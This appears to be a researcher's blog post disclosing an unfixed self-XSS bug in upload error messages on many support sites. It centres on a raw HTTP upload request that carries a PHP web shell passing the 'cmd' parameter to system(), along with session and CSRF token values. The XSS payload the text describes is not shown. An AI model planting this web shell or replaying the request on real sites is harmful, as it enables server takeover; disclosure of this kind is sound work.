Self XSS in error Content-Type on 20 000 + websites (en)

Continuing my previous post  .

Self xss vulnerability in the support sites.

Select the boot image, trying to load the shell, but get an error File type is not supported for image: application / octet-stream.

It’s like xss in the file name, but here xss in the content type.


POST /upload/content/image/6/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Length: 288
Content-Type: multipart/form-data; boundary=—————————20589225426059
Cookie: uesessionid=hyfzrsuchqs7nckrbk1oeuijs1muyyct; csrftoken=B1zifrapMiiITZqW5WVtjD4Ye5Qn3Vv0v7iol6d75rcNLnKSMyLoFSgyuWXeVTky
Connection: close

Content-Disposition: form-data; name=”content”; filename=”shell3.php”
Content-Type: application/octet-stream

<? if($_GET[‘cmd’]) { system($_GET[‘cmd’]); } ?>

Vulnerability is at more than 20,000 sites and the sites of this list. Support is not considered dangerous, and this vulnerability has decided not to fix it.

Video .

Subscribe for more articles)


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s